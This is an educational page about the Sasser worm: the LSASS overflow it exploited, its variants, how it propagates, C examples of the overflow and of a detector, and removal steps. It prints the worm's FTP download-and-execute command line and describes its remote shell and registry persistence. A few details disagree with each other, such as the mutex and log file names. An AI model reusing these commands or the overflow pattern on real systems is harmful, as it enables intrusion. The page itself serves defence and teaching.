4) Sasser Worm

media type="youtube" key="_d9Rl6SJmwk" width="558" height="417" align="center"

= What is Sasser Worm? =
 * Sasser is a computer worm that affects computers running vulnerable versions of Microsoft Windows XP, Windows 2000 and Windows Server 2003. Sasser spreads by exploiting the system through a vulnerable network port, which makes it particularly virulent: it can spread without any user intervention. However, it is also easily stopped by a properly configured firewall or by installing the system updates from Windows Update.

= Versions of Sasser Worm =
 * 1) **Sasser A: Original.**
 * 2) **Sasser B: Uses a different file name (avserve2.exe). Creates a different value in the registry to account for the change in file name. Uses a different mutex (jobaka3).**
 * 3) **Sasser C: Changed the number of threads from 128 to 1024.**
 * 4) **Sasser D: Changed the number of threads back to 128 and used the ICMPSendEcho API to speed up scanning. Does not run on Windows 2000.**
 * 5) **Sasser E: Changed shell and FTP ports to 1022 and 1023 respectively. Also, pops up a message alerting the user of vulnerability to MS04-011. Does not run on Windows 2000.**
 * 6) **Sasser F: Repack of the Sasser A (original) - minor modification through hex-editor.**


= The Spread of Sasser Worm over Other Worms =
 * Netsky and Bagle worms, for example, rely on email and on users opening email attachments. The worm is attached to an email that is forwarded to all email addresses it finds on the infected system. This infection mechanism is not as efficient as Sasser's. Sasser's approach picks random public IP addresses on the network and spreads to vulnerable systems without any user interaction (i.e. there is no need for a user to open an attachment). This self-reliant approach makes Sasser spread faster than the Netsky and Bagle worms.

= What areas does it affect? =
 * The specific hole Sasser exploits is documented by Microsoft in its MS04-011 bulletin, for which a patch had been released seventeen days earlier. An infected computer usually shuts itself down automatically with an error message about lsass.exe.
 * The patch from Microsoft known as the MS04-011 Security Update fixes the following vulnerabilities:
 * **LSASS Vulnerability**
 * **LDAP Vulnerability**
 * **PCT Vulnerability**
 * **Winlogon Vulnerability**
 * **Metafile Vulnerability**
 * **Help and Support Center Vulnerability**
 * **Utility Manager Vulnerability**
 * **Windows Management Vulnerability**
 * **Local Descriptor Table Vulnerability**
 * **H.323 Vulnerability**
 * **Virtual DOS Machine Vulnerability**
 * **Negotiate SSP Vulnerability**
 * **SSL Vulnerability**
 * **ASN.1 “Double-Free” Vulnerability**


 * Download the Windows patches for the vulnerabilities from Microsoft for the following platforms:
 * Windows XP and Windows XP Service Pack 1
 * Windows 2000 Service Packs 2, 3, and 4
 * You can also visit Microsoft's site for patches for Windows NT, Windows XP 64-bit Edition and Windows Server 2003.

= What exploits can the attack use? =

__**Integer Overflow:**__ Because computer systems have a finite amount of memory, malicious users can use specially crafted input to cause an arithmetic (carry) overflow, which happens when the result of a computation becomes too large for its representation. This can let the malicious user gain special permissions or reach memory locations and program areas they should not be able to access.

__**Characters (UTF-8 Encoding):**__ The UTF-8 encoding of the Unicode character set can let a single character (e.g. an ASCII character) be represented in more than one way. This can be used to feed specific malicious content to programs or systems, since the input validation may not guard against the alternative encodings.

__**Buffer Overrun (or Overflow):**__ When the value assigned to a variable exceeds the size of the buffer allocated for it, memory locations not allocated to that variable are overwritten. This type of problem can let the attacker gain special permissions and privileges and obtain access to special resources such as a shell.

= How Does Sasser Work? =
 * In general, the Sasser worm infects computer systems and gains full control of them through a buffer overflow attack on the Local Security Authority Subsystem Service (LSASS). It then propagates to other vulnerable systems by scanning random IP addresses.


 * When W32.Sasser.Worm runs, it installs a copy of itself as "AVSERVE.EXE" in the Windows folder. Then it adds the following registry entry so that it is executed every time the system is started:


 * HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Run
 * avserve.exe = %Windows%\avserve.exe


 * Again, the user is not the one who started the program; it is simply started automatically once the computer has been compromised. Therefore, the user may not even be aware that anything is happening on the system.


 * Then, the program finds out whether the current system is already infected by looking for the mutex "Jobaka3l" and, depending on the result, decides whether to continue or stop executing.


 * After that, the program uses the AbortSystemShutdown API to hinder attempts to shut down, restart, or reboot the computer.


 * At the same time, the worm starts the following:
 * __Look for other systems to infect:__ Once the worm has infected the system, it installs an FTP server on TCP port 5554 (a port used to serve copies of the worm to other systems). The purpose of this is to serve a copy of the worm program to systems that have been (or are about to be) exploited. Note that this means each of the many infected computers is able to send the worm to other systems through its own FTP server.
 * __Find and attack vulnerable systems:__
 * It starts 128 threads to scan for vulnerable systems. The threads loop through all addresses returned by the gethostbyname function for the local hostname and try to find all publicly routable Internet addresses, which are targeted. If none are found, local addresses are targeted.
 * The program sends a message to the target computer on TCP port 445 (the port the worm attacks). The message takes advantage of a vulnerability in LSASS that allows the attacker to run remote code with system-level privileges. The buffer overflow exists in the Active Directory service functions exposed by the LSASS endpoints; those functions provide Active Directory services both locally and remotely, with no special privileges required. The vulnerability is in a logging function that uses the vsprintf routine, which has no bounds checking. This means that passing a long enough string as a parameter causes a buffer overflow. Once this buffer overflow is achieved, 2KB of code can be executed on the remote host.
 * __Replicate itself on vulnerable systems:__ Once a system has been breached, the malicious code opens a command shell on TCP port 9996 (a remote shell used by target systems to download the worm and get infected). The code instructs the computer to download and run the worm from the attacker's computer using the FTP server described above. The following command line is executed to achieve this:


 * echo off&echo open [infecting machine's IP] 5554>>cmd.ftp&echo anonymous>>cmd.ftp&echo user&echo bin>>cmd.ftp&echo get [rand]_up.exe>>cmd.ftp&echo bye>>cmd.ftp&echo on&ftp -s:cmd.ftp&[rand]i_up.exe&echo off&del cmd.ftp&echo on


 * The commands above, which are run on the target system, do the following:
 * 1) Open TCP port 5554 to accept FTP requests from infected systems
 * 2) Download (through the "get" command) and execute a copy of the worm program. The program has the file name [random_integer]_up.exe (e.g. 123_up.exe).
 * 3) Delete the file cmd.ftp, which contains all the instructions for downloading the worm through the FTP server.


 * Finally, all the FTP transactions are stored in the file C:\WIN.LOG, which contains the number of systems the worm was able to infect and the IP address of the last infected system.
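The LSASS flaw described above, a logging routine that formats an attacker-supplied string with vsprintf and no bounds check, is the textbook case of the buffer overrun from the "What exploits can the attack use?" section. The C below is an added illustration and not code from this page or from Windows: a minimal logging helper in the vulnerable shape next to the bounded form that the fix amounts to; the buffer size, function names and the constructed over-long input are assumptions.

```c
#include <stdarg.h>
#include <stdio.h>
#include <string.h>

#define LOG_LINE 64   /* fixed-size log line, like the one the LSASS bug overran */

/* Vulnerable pattern: vsprintf is never told how large buf is, so a message
 * longer than LOG_LINE - 1 bytes overwrites whatever follows the buffer.
 * Shown only for the shape of the bug; never feed it untrusted input. */
int log_unbounded(char *buf, const char *fmt, ...)
{
    va_list ap;
    va_start(ap, fmt);
    int n = vsprintf(buf, fmt, ap);
    va_end(ap);
    return n;
}

/* Hardened form: vsnprintf is given the size, always NUL-terminates, and
 * returns the length the full message would have had, so the caller can
 * detect truncation instead of silently losing memory safety. */
int log_bounded(char *buf, size_t size, const char *fmt, ...)
{
    va_list ap;
    va_start(ap, fmt);
    int n = vsnprintf(buf, size, fmt, ap);
    va_end(ap);
    if (n < 0) {                 /* encoding error: leave an empty line */
        if (size) buf[0] = '\0';
        return -1;
    }
    return n;
}

/* 1 if a message needing `needed` bytes (as returned by log_bounded) did not fit. */
int log_was_truncated(int needed, size_t size)
{
    return needed >= 0 && (size_t)needed >= size;
}

/* Constructed input: an over-long name from a remote client, standing in for
 * the attacker-controlled string the page describes. Returns the bytes kept. */
size_t demo_truncation(void)
{
    char line[LOG_LINE], name[200];
    memset(name, 'A', sizeof name - 1);
    name[sizeof name - 1] = '\0';
    int needed = log_bounded(line, sizeof line, "lookup failed for %s", name);
    return log_was_truncated(needed, sizeof line) ? strlen(line) : 0;
}
```

With the bounded form the 200-byte name is cut to the 63 bytes that fit and the caller is told the message was truncated; with the unbounded form the same input would write past the 64-byte line.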


 * The end result is that you will see a screen similar to the one below when you are infected; it counts down to zero and then shuts the system down completely. The warning will state "This shutdown was initiated by NT AUTHORITY\SYSTEM" and that the system process lsass.exe terminated unexpectedly.
 * The message may be prefaced by another message:


 * See the video below for a detailed step-by-step description of how the Sasser worm works:

media type="youtube" key="AR0zY945QLU" width="600" height="448" align="center"
 * The video above depicts how the Sasser worm functions.
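Sasser's propagation (128 threads trying random addresses on TCP port 445) is also its most visible network signature. The C below is an added example, not part of the original page: a fan-out check over constructed connection records that flags a host reaching many distinct peers on port 445 within a short window; the record layout, the thresholds and the sample addresses are assumptions.

```c
#include <stddef.h>
#include <string.h>

/* One outbound TCP connection attempt, e.g. from a firewall or netflow log. */
struct conn { const char *src; const char *dst; int dport; int t; /* t: seconds */ };

#define MAX_DISTINCT 256

/* Largest number of distinct destinations `src` touched on `dport` within
 * any `window`-second span that starts at one of its own records. */
size_t max_fanout(const struct conn *c, size_t n, const char *src, int dport, int window)
{
    size_t best = 0;
    for (size_t i = 0; i < n; i++) {
        if (strcmp(c[i].src, src) != 0 || c[i].dport != dport) continue;
        const char *seen[MAX_DISTINCT];
        size_t k = 0;
        for (size_t j = 0; j < n && k < MAX_DISTINCT; j++) {
            if (strcmp(c[j].src, src) != 0 || c[j].dport != dport) continue;
            if (c[j].t < c[i].t || c[j].t > c[i].t + window) continue;
            size_t m;
            for (m = 0; m < k; m++)
                if (strcmp(seen[m], c[j].dst) == 0) break;
            if (m == k) seen[k++] = c[j].dst;   /* new distinct destination */
        }
        if (k > best) best = k;
    }
    return best;
}

/* Sasser-style propagation: one host fanning out to many distinct peers on
 * TCP/445 in a short time. The 10 s window and fan-out of 8 are assumed
 * thresholds to tune per network. */
int looks_like_lsass_scanner(const struct conn *c, size_t n, const char *src)
{
    return max_fanout(c, n, src, 445, 10) >= 8;
}

/* Constructed sample: 10.0.0.5 sweeps unrelated peers on 445 within seconds;
 * 10.0.0.9 only reaches its usual file server on 445. */
static const struct conn sample[] = {
    {"10.0.0.5", "203.0.113.1", 445, 0},  {"10.0.0.5", "203.0.113.2", 445, 0},
    {"10.0.0.5", "198.51.100.7", 445, 1}, {"10.0.0.5", "203.0.113.9", 445, 1},
    {"10.0.0.5", "192.0.2.30", 445, 2},   {"10.0.0.5", "192.0.2.31", 445, 2},
    {"10.0.0.5", "192.0.2.32", 445, 3},   {"10.0.0.5", "192.0.2.33", 445, 3},
    {"10.0.0.9", "10.0.0.2", 445, 0},     {"10.0.0.9", "10.0.0.2", 445, 4},
    {"10.0.0.9", "10.0.0.2", 445, 8},     {"10.0.0.9", "10.0.0.3", 80, 9},
};
static const size_t sample_n = sizeof sample / sizeof sample[0];
```

The same check applied to a firewall's outbound log would also surface the worm's own listeners only indirectly; pairing it with alerts on new listeners on TCP 5554 and 9996 (the ports named above) gives the host-side confirmation.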

= How Can I Remove the Sasser Worm? =
 * 1) Disconnect your computer from the local area network or Internet.
 * 2) Terminate the running program:
 * **Open the Windows Task Manager by pressing CTRL+ALT+DEL and selecting the Processes tab (on WinNT/2000/XP machines, select Task Manager and then the Processes tab).**
 * **Locate one of the following programs (depending on the variant), click on it and choose End Task or End Process:**
 * avserve.exe
 * avserve2.exe
 * skynetave.exe
 * any process running with the "_up.exe" suffix
 * **Close Task Manager**
 * 3) Activate the Windows XP firewall (if running Windows XP) or another firewall to prevent the worm from shutting your system down while you download the patches. To activate the Windows XP firewall, follow these steps:
 * **Click on Start, Control Panel**
 * **Double-click on Networking and Internet Connections, then click on Network Connections**
 * **Right-click on the connection you use to access the Internet and choose Properties**
 * **Click on the Advanced tab and check the box "Protect my computer and network by limiting or preventing access to this computer from the Internet"**
 * **Click OK and close Network Connections and the Control Panel**
 * 4) Download and install the patches for the LSASS vulnerability and the others:
 * **Microsoft Windows NT Server 4.0 Service Pack 6a**
 * **Microsoft Windows NT Server 4.0 Terminal Server Edition Service Pack 6**
 * **Microsoft Windows 2000 Service Pack 2, Microsoft Windows 2000 Service Pack 3, and Microsoft Windows 2000 Service Pack 4**
 * **Microsoft Windows XP and Microsoft Windows XP Service Pack 1**
 * **Microsoft Windows XP 64-Bit Edition Service Pack 1**
 * **Microsoft Windows XP 64-Bit Edition Version 2003**
 * **Microsoft Windows Server 2003**
 * **Microsoft Windows Server 2003 64-Bit Edition**
 * 5) Remove the registry entries:
 * **Click on Start, Run, Regedit**
 * **In the left panel go to HKEY_LOCAL_MACHINE > Software > Microsoft > Windows > CurrentVersion > Run**
 * **In the right panel, right-click and delete whichever of the following entries is present:**
 * "avserve.exe"="%Windir%\avserve.exe"
 * "avserve2.exe"="%Windir%\avserve2.exe"
 * "skynetave.exe"="%Windows%\skynetave.exe"
 * **Close the Registry Editor**
 * 6) Delete the infected files (for Windows ME and XP, remember to turn off System Restore before searching for and deleting these files, so that infected backed-up copies are removed as well):
 * **Click Start, point to Find or Search, and then click Files or Folders.**
 * **Make sure that "Look in" is set to (C:\WINDOWS).**
 * **In the "Named" or "Search for..." box, type, or copy and paste, the file names:**
 * avserve.exe
 * avserve2.exe
 * skynetave.exe
 * C:\win2.log
 * **Click Find Now or Search Now.**
 * **Delete the displayed files.**
 * **Empty the Recycle Bin.**
 * 7) Reboot the computer, update your antivirus software, and run a thorough virus scan using your favorite antivirus program.
 * For automatic removal of Sasser, download the Symantec removal tool. You will still need to download and install the patches above; however, this removal tool will stop the Sasser worm from running, remove the items in the registry, and delete the infected files.